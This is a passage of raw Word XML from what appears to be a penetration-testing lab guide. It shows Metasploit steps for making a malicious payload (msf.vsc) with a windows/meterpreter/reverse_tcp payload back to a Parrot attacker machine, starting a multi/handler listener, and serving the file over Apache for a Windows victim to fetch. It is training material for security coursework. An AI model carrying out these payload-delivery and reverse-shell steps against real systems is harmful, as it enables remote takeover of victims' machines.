          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Any how this exploit uses the default payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61877A8C" w14:textId="59DF1FAD"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5A046BEE" wp14:editId="0CF2CE40">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="154706887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5752667" w14:textId="6E91FE7D"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76AD7A13">
          <v:shape id="_x0000_i1139" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId29" w:name="DefaultOcxName10" w:shapeid="_x0000_i1139"/>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 xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 172.19.19.18</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (IP Address of </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Parrot</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> machine)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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4EF338" w14:textId="08ABCFC2"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8312B54" wp14:editId="18B23BC6">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1868273905"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1D56EDA" w14:textId="523F024E"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11581C3F">
          <v:shape id="_x0000_i1138" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId31" w:name="DefaultOcxName11" w:shapeid="_x0000_i1138"/>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exploit</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This creates a malicious payload named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msf.vsc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> in </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pentester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/.msf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4/local</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540A9449" w14:textId="2519E323"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C40518F" wp14:editId="1A3CAF32">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1271261751"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4E78E5C" w14:textId="0C6DF224"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4A85CF63">
          <v:shape id="_x0000_i1137" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId33" w:name="DefaultOcxName12" w:shapeid="_x0000_i1137"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Now, type </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324D3118" w14:textId="64A82BFE"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0A71ED4C" wp14:editId="07E483FD">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="154585930"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6613F1B" w14:textId="4A3E4EC2"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4FA93867">
          <v:shape id="_x0000_i1136" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId35" w:name="DefaultOcxName13" w:shapeid="_x0000_i1136"/>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set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBEE365" w14:textId="4CF6450C"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29E59F4F" wp14:editId="6250B32A">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="268506625"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5268BCF" w14:textId="3C5B114A"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691D7602">
          <v:shape id="_x0000_i1135" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId37" w:name="DefaultOcxName14" w:shapeid="_x0000_i1135"/>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 xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 172.19.19.18</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CE5041" w14:textId="641CD126"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2A45228A" wp14:editId="02752BC5">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1350678830"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FE98F1A" w14:textId="0E57E48F"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394ACC9E">
          <v:shape id="_x0000_i1134" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId39" w:name="DefaultOcxName15" w:shapeid="_x0000_i1134"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Type </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit</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xml:space="preserve">. Now the Listener is active and when the payload is executed on the victim machine, then the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> session appears.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E23A8D8" w14:textId="411ECB80"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0598A3FE" wp14:editId="7F96393D">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1787319370"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911537D" w14:textId="3FCF1AB7"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4BD7EB8A">
          <v:shape id="_x0000_i1133" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId41" w:name="DefaultOcxName16" w:shapeid="_x0000_i1133"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Launch a new command line terminal, and type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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xml:space="preserve">. Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>toor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and press Enter to attain root privileges. Type </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>service apache2 start</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to start the apache2 service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BCC756" w14:textId="77777777" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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If you are continuing with the previous lab (Exploiting and Escalating Privileges on a Windows Operating System) then you can directly skip to step </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3821C8" w14:textId="6174DF9A"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3573E3AD" wp14:editId="4BCBB894">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="824855384"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D74D2F1" w14:textId="33ECE259"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39F235D2">
          <v:shape id="_x0000_i1132" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId43" w:name="DefaultOcxName17" w:shapeid="_x0000_i1132"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/www/html/share</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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to create a new folder named </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CD46DC" w14:textId="21DC27E8"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1C078831" wp14:editId="6CB97576">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="100751321"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F244190" w14:textId="127E0C87"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68007D8A">
          <v:shape id="_x0000_i1131" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId45" w:name="DefaultOcxName18" w:shapeid="_x0000_i1131"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Copy the malicious payload to share folder by executing the following command: </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cp /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pentester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/.msf4/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msf.vsc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/www/html/share/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF3EA68" w14:textId="0F12ED92"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5DD0ABF" wp14:editId="284235B3">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="360953393"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474815B" w14:textId="733F0834"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3BF225A4">
          <v:shape id="_x0000_i1130" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId47" w:name="DefaultOcxName19" w:shapeid="_x0000_i1130"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Click @</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lab.VirtualMachine</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(SalesDepartmentSubnetD).SelectLink, launch the </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Google Chrome</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> web browser, type the URL </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://172.19.19.18/share</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> in the address bar and press </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. This displays the shared file in the browser as shown in the screenshot below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74935759" w14:textId="77777777" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE0E0"/>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Since this is a lab demonstration, we are directly accessing the shared location from the Windows machine.</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
